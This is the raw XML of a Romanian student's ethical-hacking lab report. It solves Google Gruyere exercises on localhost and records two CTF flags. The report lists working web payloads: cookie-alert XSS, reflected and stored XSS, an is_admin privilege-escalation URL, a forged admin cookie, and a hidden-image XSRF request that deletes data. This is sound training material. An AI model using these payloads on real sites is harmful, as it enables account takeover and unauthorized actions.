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9C8B" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2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Laborator Modul 4 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ethical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hacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="117C6461" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C239595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6"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Google Gruyere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2E65BF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1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B022A87" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="103" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cont: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r>
          <w:t>ana@yahoo.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D264439" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="103" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Parola cont: parola123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70142DF9" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="103" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Snippet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: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:hAnsi="sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ai, n-ai </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:hAnsi="sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>minge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:hAnsi="sans-serif"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, dai la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>poarta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51349F9E" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="103" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">poza </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adaugata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>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8053BE" wp14:editId="5E196541">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1254556</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-21579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="354970" cy="359267"/>
            <wp:effectExtent l="0" t="0" r="6980" b="2683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70" cy="35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C5B78" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="103" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fisier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:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ADFA17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US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076002A0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F4E6886" wp14:editId="4E0CA476">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>5760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-40690</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2929280" cy="1944380"/>
            <wp:effectExtent l="0" t="0" r="4420" b="0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280" cy="194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1.2 - File Upload XSS.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Creați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și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adăugați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un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fișier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care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permite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rularea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unui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script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0951656E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script.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACF45F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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102797F6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alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD7BBA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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8073B9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1.3 - Reflected XSS.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Găsiți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un URL</w:t>
      </w:r>
      <w:proofErr w:type="gram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care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să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permită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rularea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16E4624A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unui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script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529B81E1" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/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</w:pPr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http://127.0.0.1:8008/570222091152066468084742264731143097641/&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D27C24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</w:p>
    <w:p w14:paraId="4FF13E07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1.4 - Stored XSS.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Adăugați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un script care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să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deservească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și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altui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utilizator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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E58149" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/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</w:pPr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 xml:space="preserve">&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 xml:space="preserve">1)" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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="#"&gt;read this!&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239DB932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</w:p>
    <w:p w14:paraId="74D66763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lastRenderedPageBreak/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1.5 - Elevation of Privilege.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Transformați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contul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creat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într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-un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cont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de administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604931F4" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:rFonts w:ascii="monospace" w:hAnsi="monospace" w:cs="TimesNewRomanPS-BoldItalicMT"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="660000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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http://127.0.0.1:8008/570222091152066468084742264731143097641/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="monospace" w:hAnsi="monospace" w:cs="TimesNewRomanPS-BoldItalicMT"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="660000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>saveprofile?action=update&amp;is_admin=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730E5A8B" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:rFonts w:ascii="monospace" w:hAnsi="monospace" w:cs="TimesNewRomanPS-BoldItalicMT"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="660000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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http://127.0.0.1:8008/570222091152066468084742264731143097641/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="monospace" w:hAnsi="monospace" w:cs="TimesNewRomanPS-BoldItalicMT"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="660000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>saveprofile?action=update&amp;is_admin=True&amp;uid=ana@yahoo.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B47ED6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1.6 - Cookie Manipulation.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Obțineți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un cookie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pentru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un alt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F72806E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cont.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B5C7A4" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:rFonts w:ascii="monospace" w:hAnsi="monospace" w:cs="TimesNewRomanPS-BoldItalicMT"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="660000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="monospace" w:hAnsi="monospace" w:cs="TimesNewRomanPS-BoldItalicMT"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="660000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cont_nou|admin|author</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76B8A396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1.7 - XSRF Challenge.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Obțineți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o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modalitate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ștergere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a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2468967F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înregistrărilor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de tip snippet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B625A48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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> src="http://127.0.0.1:8008/404292361445740678385717004476956412398/deletesnippet?index=0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E5552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 xml:space="preserve">    style="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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display:none</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="TimesNewRomanPS-BoldItalicMT" w:hAnsi="TimesNewRomanPS-BoldItalicMT" w:cs="TimesNewRomanPS-BoldItalicMT"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778C0A78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1.8 -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Urmați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cel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puțin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una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dintre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modalitățile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citire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bazei</w:t>
      </w:r>
      <w:proofErr w:type="spell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de date </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>conform</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r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  <w:t xml:space="preserve"> Configuration Vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A9C12" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana, Arial, Helvetica, sans" w:hAnsi="Verdana, Arial, Helvetica, sans" w:cs="TimesNewRomanPS-BoldItalicMT"/>
          <w:color w:val="660066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana, Arial, Helvetica, sans" w:hAnsi="Verdana, Arial, Helvetica, sans" w:cs="TimesNewRomanPS-BoldItalicMT"/>
          <w:color w:val="660066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Information disclosure #1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C24FC1" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="TimesNewRomanPS-BoldItalicMT"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="660000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://127.0.0.1:8008/570222091152066468084742264731143097641/dump.gtl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7A8A8F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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11227BED" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard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en-US"/>
        </w:rPr>
        <w:t>3. CTF - Reverse Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F8DCD4" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard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3.1.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yopass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-go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503CB7E3" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ctf{0962393ce380c3cf696c6c59a085cde0f7edd1382f2e9090220abdf9a6396c88}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44675781" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard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Exercițiul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3.2. better-cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B94DA1C" w14:textId="77777777" w:rsidR="00BC4BD2" w:rsidRDefault="00BC4BD2" w:rsidP="00BC4BD2">
      <w:pPr>
        <w:pStyle w:val="Standard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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ctf{a818778ec7a9fc1988724ae3700b42e998eb09450eab7f1236e53bfdcd923878}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C396A80" w14:textId="1037BE4E" w:rsidR="00C17CF4" w:rsidRPr="00BC4BD2" w:rsidRDefault="00C17CF4" w:rsidP="00BC4BD2"/>
    <w:sectPr w:rsidR="00C17CF4" w:rsidRPr="00BC4B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Mono">
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
  </w:font>
  <w:font w:name="TimesNewRomanPS-BoldItalicMT">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="sans-serif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libri"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Verdana, Arial, Helvetica, sans">
    <w:altName w:val="Verdana"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="TimesNewRomanPS-BoldMT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F4"/>
    <w:rsid w:val="003D3369"/>
    <w:rsid w:val="00BC4BD2"/>
    <w:rsid w:val="00C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FB17"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{150C1440-E30E-4FC7-9B28-CEB86889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D2"/>
    <w:pPr>
      <w:keepNext/>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="140" w:after="120"/>
      <w:textAlignment w:val="baseline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BD2"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="DejaVu Sans" w:hAnsi="Liberation Serif" w:cs="DejaVu Sans"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="ro-RO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Standard">
    <w:name w:val="Standard"/>
    <w:rsid w:val="00BC4BD2"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="DejaVu Sans"/>
      <w:lang w:val="ro-RO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="PreformattedText">
    <w:name w:val="Preformatted Text"/>
    <w:basedOn w:val="Standard"/>
    <w:rsid w:val="00BC4BD2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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-22T09:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-16T11:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>